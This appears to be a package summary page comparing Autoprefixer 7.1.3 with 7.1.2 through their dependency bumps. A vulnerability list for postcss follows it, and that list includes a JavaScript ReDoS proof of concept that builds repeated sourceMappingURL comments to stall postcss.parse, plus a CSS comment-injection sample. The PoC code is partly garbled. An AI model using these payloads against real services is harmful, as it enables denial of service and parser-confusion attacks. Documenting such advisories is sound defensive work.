Autoprefixer version 7.1.3 represents a subtle but important update over its predecessor, version 7.1.2. Both versions serve the core purpose of parsing CSS and adding necessary vendor prefixes, leveraging data from "Can I Use" to ensure cross-browser compatibility. Key improvements lie in the updated dependencies.
Specifically, version 7.1.3 upgrades "postcss" from "^6.0.6" to "^6.0.10", "browserslist" from "^2.1.5" to "^2.4.0", and "caniuse-lite" from "^1.0.30000697" to "^1.0.30000718". These dependency bumps are crucial as they bring the latest browser support information and potentially address bug fixes or performance enhancements within those underlying libraries. The "caniuse-lite" update keeps Autoprefixer's prefixing logic accurate and up-to-date with the evolving browser landscape.
In the devDependencies, notable upgrades include "eslint" (from "^4.1.1" to "^4.5.0"), "fs-extra" (from "^3.0.1" to "^4.0.1"), "gulp-babel" (from "^6.1.2" to "^7.0.0"), and "size-limit" (from "^0.5.0" to "^0.10.0"). While these are primarily development-related, they can impact the build process, code quality, and overall development experience. Upgrading gulp-babel to version 7, is more notable, as this might introduce breaking changes in the older gulp files, so developers must pay more attention to this version.
For developers, these updates translate to more reliable and accurate CSS prefixing, ensuring broader browser support and a smoother experience. Regularly updating to the latest minor versions like this one is generally recommended to benefit from these incremental improvements and stay current with web standards. The bump is also recent to the day of writing this summary, indicating that the authors of "autoprefixer" are consistently mantaining the lib and ensuring compatibility.
All the vulnerabilities related to the version 7.1.3 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.